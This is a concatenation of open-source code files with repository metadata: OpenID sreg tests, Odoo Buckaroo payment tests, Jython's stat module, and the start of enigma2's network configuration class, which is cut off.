@climate.annotate( root='load data from this root directory', output='save chunks to this directory', frames=('compute jacobian over this many frames', 'option', None, int), ) def main(root, output, frames=10): trials = lmj.cubes.Experiment(root).trials_matching('*') work = joblib.delayed(extract) joblib.Parallel(-1)(work(t, root, output, frames) for t in trials) if __name__ == '__main__': climate.call(main)
mit
ehashman/oh-mainline
vendor/packages/python-openid/openid/test/test_sreg.py
86
17151
from openid.extensions import sreg from openid.message import NamespaceMap, Message, registerNamespaceAlias from openid.server.server import OpenIDRequest, OpenIDResponse import unittest class SRegURITest(unittest.TestCase): def test_is11(self): self.failUnlessEqual(sreg.ns_uri_1_1, sreg.ns_uri) class CheckFieldNameTest(unittest.TestCase): def test_goodNamePasses(self): for field_name in sreg.data_fields: sreg.checkFieldName(field_name) def test_badNameFails(self): self.failUnlessRaises(ValueError, sreg.checkFieldName, 'INVALID') def test_badTypeFails(self): self.failUnlessRaises(ValueError, sreg.checkFieldName, None) # For supportsSReg test class FakeEndpoint(object): def __init__(self, supported): self.supported = supported self.checked_uris = [] def usesExtension(self, namespace_uri): self.checked_uris.append(namespace_uri) return namespace_uri in self.supported class SupportsSRegTest(unittest.TestCase): def test_unsupported(self): endpoint = FakeEndpoint([]) self.failIf(sreg.supportsSReg(endpoint)) self.failUnlessEqual([sreg.ns_uri_1_1, sreg.ns_uri_1_0], endpoint.checked_uris) def test_supported_1_1(self): endpoint = FakeEndpoint([sreg.ns_uri_1_1]) self.failUnless(sreg.supportsSReg(endpoint)) self.failUnlessEqual([sreg.ns_uri_1_1], endpoint.checked_uris) def test_supported_1_0(self): endpoint = FakeEndpoint([sreg.ns_uri_1_0]) self.failUnless(sreg.supportsSReg(endpoint)) self.failUnlessEqual([sreg.ns_uri_1_1, sreg.ns_uri_1_0], endpoint.checked_uris) class FakeMessage(object): def __init__(self): self.openid1 = False self.namespaces = NamespaceMap() def isOpenID1(self): return self.openid1 class GetNSTest(unittest.TestCase): def setUp(self): self.msg = FakeMessage() def test_openID2Empty(self): ns_uri = sreg.getSRegNS(self.msg) self.failUnlessEqual(self.msg.namespaces.getAlias(ns_uri), 'sreg') self.failUnlessEqual(sreg.ns_uri, ns_uri) def test_openID1Empty(self): self.msg.openid1 = True ns_uri = sreg.getSRegNS(self.msg) self.failUnlessEqual(self.msg.namespaces.getAlias(ns_uri), 'sreg') self.failUnlessEqual(sreg.ns_uri, ns_uri) def test_openID1Defined_1_0(self): self.msg.openid1 = True self.msg.namespaces.add(sreg.ns_uri_1_0) ns_uri = sreg.getSRegNS(self.msg) self.failUnlessEqual(sreg.ns_uri_1_0, ns_uri) def test_openID1Defined_1_0_overrideAlias(self): for openid_version in [True, False]: for sreg_version in [sreg.ns_uri_1_0, sreg.ns_uri_1_1]: for alias in ['sreg', 'bogus']: self.setUp() self.msg.openid1 = openid_version self.msg.namespaces.addAlias(sreg_version, alias) ns_uri = sreg.getSRegNS(self.msg) self.failUnlessEqual(self.msg.namespaces.getAlias(ns_uri), alias) self.failUnlessEqual(sreg_version, ns_uri) def test_openID1DefinedBadly(self): self.msg.openid1 = True self.msg.namespaces.addAlias('http://invalid/', 'sreg') self.failUnlessRaises(sreg.SRegNamespaceError, sreg.getSRegNS, self.msg) def test_openID2DefinedBadly(self): self.msg.openid1 = False self.msg.namespaces.addAlias('http://invalid/', 'sreg') self.failUnlessRaises(sreg.SRegNamespaceError, sreg.getSRegNS, self.msg) def test_openID2Defined_1_0(self): self.msg.namespaces.add(sreg.ns_uri_1_0) ns_uri = sreg.getSRegNS(self.msg) self.failUnlessEqual(sreg.ns_uri_1_0, ns_uri) def test_openID1_sregNSfromArgs(self): args = { 'sreg.optional': 'nickname', 'sreg.required': 'dob', } m = Message.fromOpenIDArgs(args) self.failUnless(m.getArg(sreg.ns_uri_1_1, 'optional') == 'nickname') self.failUnless(m.getArg(sreg.ns_uri_1_1, 'required') == 'dob') class SRegRequestTest(unittest.TestCase): def test_constructEmpty(self): req = sreg.SRegRequest() self.failUnlessEqual([], req.optional) self.failUnlessEqual([], req.required) self.failUnlessEqual(None, req.policy_url) self.failUnlessEqual(sreg.ns_uri, req.ns_uri) def test_constructFields(self): req = sreg.SRegRequest( ['nickname'], ['gender'], 'http://policy', 'http://sreg.ns_uri') self.failUnlessEqual(['gender'], req.optional) self.failUnlessEqual(['nickname'], req.required) self.failUnlessEqual('http://policy', req.policy_url) self.failUnlessEqual('http://sreg.ns_uri', req.ns_uri) def test_constructBadFields(self): self.failUnlessRaises( ValueError, sreg.SRegRequest, ['elvis']) def test_fromOpenIDRequest(self): args = {} ns_sentinel = object() args_sentinel = object() class FakeMessage(object): copied = False def __init__(self): self.message = Message() def getArgs(msg_self, ns_uri): self.failUnlessEqual(ns_sentinel, ns_uri) return args_sentinel def copy(msg_self): msg_self.copied = True return msg_self class TestingReq(sreg.SRegRequest): def _getSRegNS(req_self, unused): return ns_sentinel def parseExtensionArgs(req_self, args): self.failUnlessEqual(args_sentinel, args) openid_req = OpenIDRequest() msg = FakeMessage() openid_req.message = msg req = TestingReq.fromOpenIDRequest(openid_req) self.failUnless(type(req) is TestingReq) self.failUnless(msg.copied) def test_parseExtensionArgs_empty(self): req = sreg.SRegRequest() results = req.parseExtensionArgs({}) self.failUnlessEqual(None, results) def test_parseExtensionArgs_extraIgnored(self): req = sreg.SRegRequest() req.parseExtensionArgs({'janrain':'inc'}) def test_parseExtensionArgs_nonStrict(self): req = sreg.SRegRequest() req.parseExtensionArgs({'required':'beans'}) self.failUnlessEqual([], req.required) def test_parseExtensionArgs_strict(self): req = sreg.SRegRequest() self.failUnlessRaises( ValueError, req.parseExtensionArgs, {'required':'beans'}, strict=True) def test_parseExtensionArgs_policy(self): req = sreg.SRegRequest() req.parseExtensionArgs({'policy_url':'http://policy'}, strict=True) self.failUnlessEqual('http://policy', req.policy_url) def test_parseExtensionArgs_requiredEmpty(self): req = sreg.SRegRequest() req.parseExtensionArgs({'required':''}, strict=True) self.failUnlessEqual([], req.required) def test_parseExtensionArgs_optionalEmpty(self): req = sreg.SRegRequest() req.parseExtensionArgs({'optional':''}, strict=True) self.failUnlessEqual([], req.optional) def test_parseExtensionArgs_optionalSingle(self): req = sreg.SRegRequest() req.parseExtensionArgs({'optional':'nickname'}, strict=True) self.failUnlessEqual(['nickname'], req.optional) def test_parseExtensionArgs_optionalList(self): req = sreg.SRegRequest() req.parseExtensionArgs({'optional':'nickname,email'}, strict=True) self.failUnlessEqual(['nickname','email'], req.optional) def test_parseExtensionArgs_optionalListBadNonStrict(self): req = sreg.SRegRequest() req.parseExtensionArgs({'optional':'nickname,email,beer'}) self.failUnlessEqual(['nickname','email'], req.optional) def test_parseExtensionArgs_optionalListBadStrict(self): req = sreg.SRegRequest() self.failUnlessRaises( ValueError, req.parseExtensionArgs, {'optional':'nickname,email,beer'}, strict=True) def test_parseExtensionArgs_bothNonStrict(self): req = sreg.SRegRequest() req.parseExtensionArgs({'optional':'nickname', 'required':'nickname'}) self.failUnlessEqual([], req.optional) self.failUnlessEqual(['nickname'], req.required) def test_parseExtensionArgs_bothStrict(self): req = sreg.SRegRequest() self.failUnlessRaises( ValueError, req.parseExtensionArgs, {'optional':'nickname', 'required':'nickname'}, strict=True) def test_parseExtensionArgs_bothList(self): req = sreg.SRegRequest() req.parseExtensionArgs({'optional':'nickname,email', 'required':'country,postcode'}, strict=True) self.failUnlessEqual(['nickname','email'], req.optional) self.failUnlessEqual(['country','postcode'], req.required) def test_allRequestedFields(self): req = sreg.SRegRequest() self.failUnlessEqual([], req.allRequestedFields()) req.requestField('nickname') self.failUnlessEqual(['nickname'], req.allRequestedFields()) req.requestField('gender', required=True) requested = req.allRequestedFields() requested.sort() self.failUnlessEqual(['gender', 'nickname'], requested) def test_wereFieldsRequested(self): req = sreg.SRegRequest() self.failIf(req.wereFieldsRequested()) req.requestField('gender') self.failUnless(req.wereFieldsRequested()) def test_contains(self): req = sreg.SRegRequest() for field_name in sreg.data_fields: self.failIf(field_name in req) self.failIf('something else' in req) req.requestField('nickname') for field_name in sreg.data_fields: if field_name == 'nickname': self.failUnless(field_name in req) else: self.failIf(field_name in req) def test_requestField_bogus(self): req = sreg.SRegRequest() self.failUnlessRaises( ValueError, req.requestField, 'something else') self.failUnlessRaises( ValueError, req.requestField, 'something else', strict=True) def test_requestField(self): # Add all of the fields, one at a time req = sreg.SRegRequest() fields = list(sreg.data_fields) for field_name in fields: req.requestField(field_name) self.failUnlessEqual(fields, req.optional) self.failUnlessEqual([], req.required) # By default, adding the same fields over again has no effect for field_name in fields: req.requestField(field_name) self.failUnlessEqual(fields, req.optional) self.failUnlessEqual([], req.required) # Requesting a field as required overrides requesting it as optional expected = list(fields) overridden = expected.pop(0) req.requestField(overridden, required=True) self.failUnlessEqual(expected, req.optional) self.failUnlessEqual([overridden], req.required) # Requesting a field as required overrides requesting it as optional for field_name in fields: req.requestField(field_name, required=True) self.failUnlessEqual([], req.optional) self.failUnlessEqual(fields, req.required) # Requesting it as optional does not downgrade it to optional for field_name in fields: req.requestField(field_name) self.failUnlessEqual([], req.optional) self.failUnlessEqual(fields, req.required) def test_requestFields_type(self): req = sreg.SRegRequest() self.failUnlessRaises(TypeError, req.requestFields, 'nickname') def test_requestFields(self): # Add all of the fields req = sreg.SRegRequest() fields = list(sreg.data_fields) req.requestFields(fields) self.failUnlessEqual(fields, req.optional) self.failUnlessEqual([], req.required) # By default, adding the same fields over again has no effect req.requestFields(fields) self.failUnlessEqual(fields, req.optional) self.failUnlessEqual([], req.required) # Requesting a field as required overrides requesting it as optional expected = list(fields) overridden = expected.pop(0) req.requestFields([overridden], required=True) self.failUnlessEqual(expected, req.optional) self.failUnlessEqual([overridden], req.required) # Requesting a field as required overrides requesting it as optional req.requestFields(fields, required=True) self.failUnlessEqual([], req.optional) self.failUnlessEqual(fields, req.required) # Requesting it as optional does not downgrade it to optional req.requestFields(fields) self.failUnlessEqual([], req.optional) self.failUnlessEqual(fields, req.required) def test_getExtensionArgs(self): req = sreg.SRegRequest() self.failUnlessEqual({}, req.getExtensionArgs()) req.requestField('nickname') self.failUnlessEqual({'optional':'nickname'}, req.getExtensionArgs()) req.requestField('email') self.failUnlessEqual({'optional':'nickname,email'}, req.getExtensionArgs()) req.requestField('gender', required=True) self.failUnlessEqual({'optional':'nickname,email', 'required':'gender'}, req.getExtensionArgs()) req.requestField('postcode', required=True) self.failUnlessEqual({'optional':'nickname,email', 'required':'gender,postcode'}, req.getExtensionArgs()) req.policy_url = 'http://policy.invalid/' self.failUnlessEqual({'optional':'nickname,email', 'required':'gender,postcode', 'policy_url':'http://policy.invalid/'}, req.getExtensionArgs()) data = { 'nickname':'linusaur', 'postcode':'12345', 'country':'US', 'gender':'M', 'fullname':'Leonhard Euler', 'email':'president@whitehouse.gov', 'dob':'0000-00-00', 'language':'en-us', } class DummySuccessResponse(object): def __init__(self, message, signed_stuff): self.message = message self.signed_stuff = signed_stuff def getSignedNS(self, ns_uri): return self.signed_stuff class SRegResponseTest(unittest.TestCase): def test_construct(self): resp = sreg.SRegResponse(data) self.failUnless(resp) empty_resp = sreg.SRegResponse({}) self.failIf(empty_resp) # XXX: finish this test def test_fromSuccessResponse_signed(self): message = Message.fromOpenIDArgs({ 'sreg.nickname':'The Mad Stork', }) success_resp = DummySuccessResponse(message, {}) sreg_resp = sreg.SRegResponse.fromSuccessResponse(success_resp) self.failIf(sreg_resp) def test_fromSuccessResponse_unsigned(self): message = Message.fromOpenIDArgs({ 'sreg.nickname':'The Mad Stork', }) success_resp = DummySuccessResponse(message, {}) sreg_resp = sreg.SRegResponse.fromSuccessResponse(success_resp, signed_only=False) self.failUnlessEqual([('nickname', 'The Mad Stork')], sreg_resp.items()) class SendFieldsTest(unittest.TestCase): def test(self): # Create a request message with simple registration fields sreg_req = sreg.SRegRequest(required=['nickname', 'email'], optional=['fullname']) req_msg = Message() req_msg.updateArgs(sreg.ns_uri, sreg_req.getExtensionArgs()) req = OpenIDRequest() req.message = req_msg req.namespace = req_msg.getOpenIDNamespace() # -> send checkid_* request # Create an empty response message resp_msg = Message() resp = OpenIDResponse(req) resp.fields = resp_msg # Put the requested data fields in the response message sreg_resp = sreg.SRegResponse.extractResponse(sreg_req, data) resp.addExtension(sreg_resp) # <- send id_res response # Extract the fields that were sent sreg_data_resp = resp_msg.getArgs(sreg.ns_uri) self.failUnlessEqual( {'nickname':'linusaur', 'email':'president@whitehouse.gov', 'fullname':'Leonhard Euler', }, sreg_data_resp) if __name__ == '__main__': unittest.main()
agpl-3.0
vnsofthe/odoo-dev
addons/payment_buckaroo/tests/test_buckaroo.py
321
8132
# -*- coding: utf-8 -*- from lxml import objectify import urlparse import openerp from openerp.addons.payment.models.payment_acquirer import ValidationError from openerp.addons.payment.tests.common import PaymentAcquirerCommon from openerp.addons.payment_buckaroo.controllers.main import BuckarooController from openerp.tools import mute_logger @openerp.tests.common.at_install(False) @openerp.tests.common.post_install(False) class BuckarooCommon(PaymentAcquirerCommon): def setUp(self): super(BuckarooCommon, self).setUp() cr, uid = self.cr, self.uid self.base_url = self.registry('ir.config_parameter').get_param(cr, uid, 'web.base.url') # get the buckaroo account model, self.buckaroo_id = self.registry('ir.model.data').get_object_reference(cr, uid, 'payment_buckaroo', 'payment_acquirer_buckaroo') @openerp.tests.common.at_install(False) @openerp.tests.common.post_install(False) class BuckarooForm(BuckarooCommon): def test_10_Buckaroo_form_render(self): cr, uid, context = self.cr, self.uid, {} # be sure not to do stupid things buckaroo = self.payment_acquirer.browse(self.cr, self.uid, self.buckaroo_id, None) self.assertEqual(buckaroo.environment, 'test', 'test without test environment') # ---------------------------------------- # Test: button direct rendering # ---------------------------------------- form_values = { 'add_returndata': None, 'Brq_websitekey': buckaroo.brq_websitekey, 'Brq_amount': '2240.0', 'Brq_currency': 'EUR', 'Brq_invoicenumber': 'SO004', 'Brq_signature': '1b8c10074c622d965272a91a9e88b5b3777d2474', # update me 'brq_test': 'True', 'Brq_return': '%s' % urlparse.urljoin(self.base_url, BuckarooController._return_url), 'Brq_returncancel': '%s' % urlparse.urljoin(self.base_url, BuckarooController._cancel_url), 'Brq_returnerror': '%s' % urlparse.urljoin(self.base_url, BuckarooController._exception_url), 'Brq_returnreject': '%s' % urlparse.urljoin(self.base_url, BuckarooController._reject_url), 'Brq_culture': 'en-US', } # render the button res = self.payment_acquirer.render( cr, uid, self.buckaroo_id, 'SO004', 2240.0, self.currency_euro_id, partner_id=None, partner_values=self.buyer_values, context=context) # check form result tree = objectify.fromstring(res) self.assertEqual(tree.get('action'), 'https://testcheckout.buckaroo.nl/html/', 'Buckaroo: wrong form POST url') for form_input in tree.input: if form_input.get('name') in ['submit']: continue self.assertEqual( form_input.get('value'), form_values[form_input.get('name')], 'Buckaroo: wrong value for input %s: received %s instead of %s' % (form_input.get('name'), form_input.get('value'), form_values[form_input.get('name')]) ) # ---------------------------------------- # Test2: button using tx + validation # ---------------------------------------- # create a new draft tx tx_id = self.payment_transaction.create( cr, uid, { 'amount': 2240.0, 'acquirer_id': self.buckaroo_id, 'currency_id': self.currency_euro_id, 'reference': 'SO004', 'partner_id': self.buyer_id, }, context=context ) # render the button res = self.payment_acquirer.render( cr, uid, self.buckaroo_id, 'should_be_erased', 2240.0, self.currency_euro, tx_id=tx_id, partner_id=None, partner_values=self.buyer_values, context=context) # check form result tree = objectify.fromstring(res) self.assertEqual(tree.get('action'), 'https://testcheckout.buckaroo.nl/html/', 'Buckaroo: wrong form POST url') for form_input in tree.input: if form_input.get('name') in ['submit']: continue self.assertEqual( form_input.get('value'), form_values[form_input.get('name')], 'Buckaroo: wrong value for form input %s: received %s instead of %s' % (form_input.get('name'), form_input.get('value'), form_values[form_input.get('name')]) ) @mute_logger('openerp.addons.payment_buckaroo.models.buckaroo', 'ValidationError') def test_20_buckaroo_form_management(self): cr, uid, context = self.cr, self.uid, {} # be sure not to do stupid thing buckaroo = self.payment_acquirer.browse(self.cr, self.uid, self.buckaroo_id, None) self.assertEqual(buckaroo.environment, 'test', 'test without test environment') # typical data posted by buckaroo after client has successfully paid buckaroo_post_data = { 'BRQ_RETURNDATA': u'', 'BRQ_AMOUNT': u'2240.00', 'BRQ_CURRENCY': u'EUR', 'BRQ_CUSTOMER_NAME': u'Jan de Tester', 'BRQ_INVOICENUMBER': u'SO004', 'BRQ_PAYMENT': u'573311D081B04069BD6336001611DBD4', 'BRQ_PAYMENT_METHOD': u'paypal', 'BRQ_SERVICE_PAYPAL_PAYERCOUNTRY': u'NL', 'BRQ_SERVICE_PAYPAL_PAYEREMAIL': u'fhe@openerp.com', 'BRQ_SERVICE_PAYPAL_PAYERFIRSTNAME': u'Jan', 'BRQ_SERVICE_PAYPAL_PAYERLASTNAME': u'Tester', 'BRQ_SERVICE_PAYPAL_PAYERMIDDLENAME': u'de', 'BRQ_SERVICE_PAYPAL_PAYERSTATUS': u'verified', 'BRQ_SIGNATURE': u'175d82dd53a02bad393fee32cb1eafa3b6fbbd91', 'BRQ_STATUSCODE': u'190', 'BRQ_STATUSCODE_DETAIL': u'S001', 'BRQ_STATUSMESSAGE': u'Transaction successfully processed', 'BRQ_TEST': u'true', 'BRQ_TIMESTAMP': u'2014-05-08 12:41:21', 'BRQ_TRANSACTIONS': u'D6106678E1D54EEB8093F5B3AC42EA7B', 'BRQ_WEBSITEKEY': u'5xTGyGyPyl', } # should raise error about unknown tx with self.assertRaises(ValidationError): self.payment_transaction.form_feedback(cr, uid, buckaroo_post_data, 'buckaroo', context=context) tx_id = self.payment_transaction.create( cr, uid, { 'amount': 2240.0, 'acquirer_id': self.buckaroo_id, 'currency_id': self.currency_euro_id, 'reference': 'SO004', 'partner_name': 'Norbert Buyer', 'partner_country_id': self.country_france_id, }, context=context ) # validate it self.payment_transaction.form_feedback(cr, uid, buckaroo_post_data, 'buckaroo', context=context) # check state tx = self.payment_transaction.browse(cr, uid, tx_id, context=context) self.assertEqual(tx.state, 'done', 'Buckaroo: validation did not put tx into done state') self.assertEqual(tx.buckaroo_txnid, buckaroo_post_data.get('BRQ_TRANSACTIONS'), 'Buckaroo: validation did not update tx payid') # reset tx tx.write({'state': 'draft', 'date_validate': False, 'buckaroo_txnid': False}) # now buckaroo post is ok: try to modify the SHASIGN buckaroo_post_data['BRQ_SIGNATURE'] = '54d928810e343acf5fb0c3ee75fd747ff159ef7a' with self.assertRaises(ValidationError): self.payment_transaction.form_feedback(cr, uid, buckaroo_post_data, 'buckaroo', context=context) # simulate an error buckaroo_post_data['BRQ_STATUSCODE'] = 2 buckaroo_post_data['BRQ_SIGNATURE'] = '4164b52adb1e6a2221d3d8a39d8c3e18a9ecb90b' self.payment_transaction.form_feedback(cr, uid, buckaroo_post_data, 'buckaroo', context=context) # check state tx = self.payment_transaction.browse(cr, uid, tx_id, context=context) self.assertEqual(tx.state, 'error', 'Buckaroo: erroneous validation did not put tx into error state')
agpl-3.0
hurricup/intellij-community
python/lib/Lib/stat.py
145
1667
"""Constants/functions for interpreting results of os.stat() and os.lstat(). Suggested usage: from stat import * """ # XXX Strictly spoken, this module may have to be adapted for each POSIX # implementation; in practice, however, the numeric constants used by # stat() are almost universal (even for stat() emulations on non-UNIX # systems like MS-DOS). # Indices for stat struct members in tuple returned by os.stat() ST_MODE = 0 ST_INO = 1 ST_DEV = 2 ST_NLINK = 3 ST_UID = 4 ST_GID = 5 ST_SIZE = 6 ST_ATIME = 7 ST_MTIME = 8 ST_CTIME = 9 # Extract bits from the mode def S_IMODE(mode): return mode & 07777 def S_IFMT(mode): return mode & 0170000 # Constants used as S_IFMT() for various file types # (not all are implemented on all systems) S_IFDIR = 0040000 S_IFCHR = 0020000 S_IFBLK = 0060000 S_IFREG = 0100000 S_IFIFO = 0010000 S_IFLNK = 0120000 S_IFSOCK = 0140000 # Functions to test for each file type def S_ISDIR(mode): return S_IFMT(mode) == S_IFDIR def S_ISCHR(mode): return S_IFMT(mode) == S_IFCHR def S_ISBLK(mode): return S_IFMT(mode) == S_IFBLK def S_ISREG(mode): return S_IFMT(mode) == S_IFREG def S_ISFIFO(mode): return S_IFMT(mode) == S_IFIFO def S_ISLNK(mode): return S_IFMT(mode) == S_IFLNK def S_ISSOCK(mode): return S_IFMT(mode) == S_IFSOCK # Names for permission bits S_ISUID = 04000 S_ISGID = 02000 S_ENFMT = S_ISGID S_ISVTX = 01000 S_IREAD = 00400 S_IWRITE = 00200 S_IEXEC = 00100 S_IRWXU = 00700 S_IRUSR = 00400 S_IWUSR = 00200 S_IXUSR = 00100 S_IRWXG = 00070 S_IRGRP = 00040 S_IWGRP = 00020 S_IXGRP = 00010 S_IRWXO = 00007 S_IROTH = 00004 S_IWOTH = 00002 S_IXOTH = 00001
apache-2.0
aimejeux/enigma2
lib/python/Components/Network.py
2
24018
import os import re from socket import * from Components.Console import Console from Components.PluginComponent import plugins from Plugins.Plugin import PluginDescriptor from boxbranding import getBoxType class Network: def __init__(self): self.ifaces = {} self.configuredNetworkAdapters = [] self.NetworkState = 0 self.DnsState = 0 self.nameservers = [] self.ethtool_bin = "ethtool" self.Console = Console() self.LinkConsole = Console() self.restartConsole = Console() self.deactivateInterfaceConsole = Console() self.activateInterfaceConsole = Console() self.resetNetworkConsole = Console() self.DnsConsole = Console() self.PingConsole = Console() self.config_ready = None self.friendlyNames = {} self.lan_interfaces = [] self.wlan_interfaces = [] self.remoteRootFS = None self.getInterfaces() def onRemoteRootFS(self): if self.remoteRootFS is None: import Harddisk for parts in Harddisk.getProcMounts(): if parts[1] == '/' and parts[2] == 'nfs': self.remoteRootFS = True break else: self.remoteRootFS = False return self.remoteRootFS def isBlacklisted(self, iface): return iface in ('lo', 'wifi0', 'wmaster0', 'sit0', 'tun0') def getInterfaces(self, callback = None): self.configuredInterfaces = [] for device in self.getInstalledAdapters(): self.getAddrInet(device, callback) # helper function def regExpMatch(self, pattern, string): if string is None: return None try: return pattern.search(string).group() except AttributeError: return None # helper function to convert ips from a sring to a list of ints def convertIP(self, ip): return [ int(n) for n in ip.split('.') ] def getAddrInet(self, iface, callback): if not self.Console: self.Console = Console() cmd = "ip -o addr show dev " + iface self.Console.ePopen(cmd, self.IPaddrFinished, [iface,callback]) def IPaddrFinished(self, result, retval, extra_args): (iface, callback ) = extra_args data = { 'up': False, 'dhcp': False, 'preup' : False, 'predown' : False } globalIPpattern = re.compile("scope global") ipRegexp = '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' netRegexp = '[0-9]{1,2}' macRegexp = '[0-9a-fA-F]{2}\:[0-9a-fA-F]{2}\:[0-9a-fA-F]{2}\:[0-9a-fA-F]{2}\:[0-9a-fA-F]{2}\:[0-9a-fA-F]{2}' ipLinePattern = re.compile('inet ' + ipRegexp + '/') ipPattern = re.compile(ipRegexp) netmaskLinePattern = re.compile('/' + netRegexp) netmaskPattern = re.compile(netRegexp) bcastLinePattern = re.compile(' brd ' + ipRegexp) upPattern = re.compile('UP') macPattern = re.compile(macRegexp) macLinePattern = re.compile('link/ether ' + macRegexp) for line in result.splitlines(): split = line.strip().split(' ',2) if split[1][:-1] == iface: up = self.regExpMatch(upPattern, split[2]) mac = self.regExpMatch(macPattern, self.regExpMatch(macLinePattern, split[2])) if up is not None: data['up'] = True if iface is not 'lo': self.configuredInterfaces.append(iface) if mac is not None: data['mac'] = mac if split[1] == iface: if re.search(globalIPpattern, split[2]): ip = self.regExpMatch(ipPattern, self.regExpMatch(ipLinePattern, split[2])) netmask = self.calc_netmask(self.regExpMatch(netmaskPattern, self.regExpMatch(netmaskLinePattern, split[2]))) bcast = self.regExpMatch(ipPattern, self.regExpMatch(bcastLinePattern, split[2])) if ip is not None: data['ip'] = self.convertIP(ip) if netmask is not None: data['netmask'] = self.convertIP(netmask) if bcast is not None: data['bcast'] = self.convertIP(bcast) if not data.has_key('ip'): data['dhcp'] = True data['ip'] = [0, 0, 0, 0] data['netmask'] = [0, 0, 0, 0] data['gateway'] = [0, 0, 0, 0] cmd = "route -n | grep " + iface self.Console.ePopen(cmd,self.routeFinished, [iface, data, callback]) def routeFinished(self, result, retval, extra_args): (iface, data, callback) = extra_args ipRegexp = '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' ipPattern = re.compile(ipRegexp) ipLinePattern = re.compile(ipRegexp) for line in result.splitlines(): print line[0:7] if line[0:7] == "0.0.0.0": gateway = self.regExpMatch(ipPattern, line[16:31]) if gateway: data['gateway'] = self.convertIP(gateway) self.ifaces[iface] = data self.loadNetworkConfig(iface,callback) def writeNetworkConfig(self): self.configuredInterfaces = [] fp = file('/etc/network/interfaces', 'w') fp.write("# automatically generated by enigma2\n# do NOT change manually!\n\n") fp.write("auto lo\n") fp.write("iface lo inet loopback\n\n") for ifacename, iface in self.ifaces.items(): if iface['up']: fp.write("auto " + ifacename + "\n") self.configuredInterfaces.append(ifacename) if iface['dhcp']: fp.write("iface "+ ifacename +" inet dhcp\n") fp.write(" hostname $(hostname)\n") if not iface['dhcp']: fp.write("iface "+ ifacename +" inet static\n") fp.write(" hostname $(hostname)\n") if iface.has_key('ip'): # print tuple(iface['ip']) fp.write(" address %d.%d.%d.%d\n" % tuple(iface['ip'])) fp.write(" netmask %d.%d.%d.%d\n" % tuple(iface['netmask'])) if iface.has_key('gateway'): fp.write(" gateway %d.%d.%d.%d\n" % tuple(iface['gateway'])) if iface.has_key("configStrings"): fp.write(iface["configStrings"]) if iface["preup"] is not False and not iface.has_key("configStrings"): fp.write(iface["preup"]) if iface["predown"] is not False and not iface.has_key("configStrings"): fp.write(iface["predown"]) fp.write("\n") fp.close() self.configuredNetworkAdapters = self.configuredInterfaces self.writeNameserverConfig() def writeNameserverConfig(self): try: os.system('rm -rf /etc/resolv.conf') fp = file('/etc/resolv.conf', 'w') for nameserver in self.nameservers: fp.write("nameserver %d.%d.%d.%d\n" % tuple(nameserver)) fp.close() except: print "[Network.py] interfaces - resolv.conf write failed" def loadNetworkConfig(self,iface,callback = None): interfaces = [] # parse the interfaces-file try: fp = file('/etc/network/interfaces', 'r') interfaces = fp.readlines() fp.close() except: print "[Network.py] interfaces - opening failed" ifaces = {} currif = "" for i in interfaces: split = i.strip().split(' ') if split[0] == "iface": currif = split[1] ifaces[currif] = {} if len(split) == 4 and split[3] == "dhcp": ifaces[currif]["dhcp"] = True else: ifaces[currif]["dhcp"] = False if currif == iface: #read information only for available interfaces if split[0] == "address": ifaces[currif]["address"] = map(int, split[1].split('.')) if self.ifaces[currif].has_key("ip"): if self.ifaces[currif]["ip"] != ifaces[currif]["address"] and ifaces[currif]["dhcp"] == False: self.ifaces[currif]["ip"] = map(int, split[1].split('.')) if split[0] == "netmask": ifaces[currif]["netmask"] = map(int, split[1].split('.')) if self.ifaces[currif].has_key("netmask"): if self.ifaces[currif]["netmask"] != ifaces[currif]["netmask"] and ifaces[currif]["dhcp"] == False: self.ifaces[currif]["netmask"] = map(int, split[1].split('.')) if split[0] == "gateway": ifaces[currif]["gateway"] = map(int, split[1].split('.')) if self.ifaces[currif].has_key("gateway"): if self.ifaces[currif]["gateway"] != ifaces[currif]["gateway"] and ifaces[currif]["dhcp"] == False: self.ifaces[currif]["gateway"] = map(int, split[1].split('.')) if split[0] == "pre-up": if self.ifaces[currif].has_key("preup"): self.ifaces[currif]["preup"] = i if split[0] in ("pre-down","post-down"): if self.ifaces[currif].has_key("predown"): self.ifaces[currif]["predown"] = i for ifacename, iface in ifaces.items(): if self.ifaces.has_key(ifacename): self.ifaces[ifacename]["dhcp"] = iface["dhcp"] if self.Console: if len(self.Console.appContainers) == 0: # save configured interfacelist self.configuredNetworkAdapters = self.configuredInterfaces # load ns only once self.loadNameserverConfig() # print "read configured interface:", ifaces # print "self.ifaces after loading:", self.ifaces self.config_ready = True self.msgPlugins() if callback is not None: callback(True) def loadNameserverConfig(self): ipRegexp = "[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}" nameserverPattern = re.compile("nameserver +" + ipRegexp) ipPattern = re.compile(ipRegexp) resolv = [] try: fp = file('/etc/resolv.conf', 'r') resolv = fp.readlines() fp.close() self.nameservers = [] except: print "[Network.py] resolv.conf - opening failed" for line in resolv: if self.regExpMatch(nameserverPattern, line) is not None: ip = self.regExpMatch(ipPattern, line) if ip: self.nameservers.append(self.convertIP(ip)) # print "nameservers:", self.nameservers def getInstalledAdapters(self): return [x for x in os.listdir('/sys/class/net') if not self.isBlacklisted(x)] def getConfiguredAdapters(self): return self.configuredNetworkAdapters def getNumberOfAdapters(self): return len(self.ifaces) def getFriendlyAdapterName(self, x): if x in self.friendlyNames.keys(): return self.friendlyNames.get(x, x) self.friendlyNames[x] = self.getFriendlyAdapterNaming(x) return self.friendlyNames.get(x, x) # when we have no friendly name, use adapter name def getFriendlyAdapterNaming(self, iface): name = None if self.isWirelessInterface(iface): if iface not in self.wlan_interfaces: name = _("WLAN connection") if len(self.wlan_interfaces): name += " " + str(len(self.wlan_interfaces)+1) self.wlan_interfaces.append(iface) else: if iface not in self.lan_interfaces: if getBoxType() == "et10000" and iface == "eth1": name = _("VLAN connection") else: name = _("LAN connection") if len(self.lan_interfaces) and not getBoxType() == "et10000" and not iface == "eth1": name += " " + str(len(self.lan_interfaces)+1) self.lan_interfaces.append(iface) return name def getFriendlyAdapterDescription(self, iface): if not self.isWirelessInterface(iface): return _('Ethernet network interface') moduledir = self.getWlanModuleDir(iface) if moduledir: name = os.path.basename(os.path.realpath(moduledir)) if name in ('ath_pci','ath5k'): name = 'Atheros' elif name in ('rt73','rt73usb','rt3070sta'): name = 'Ralink' elif name == 'zd1211b': name = 'Zydas' elif name == 'r871x_usb_drv': name = 'Realtek' else: name = _('Unknown') return name + ' ' + _('wireless network 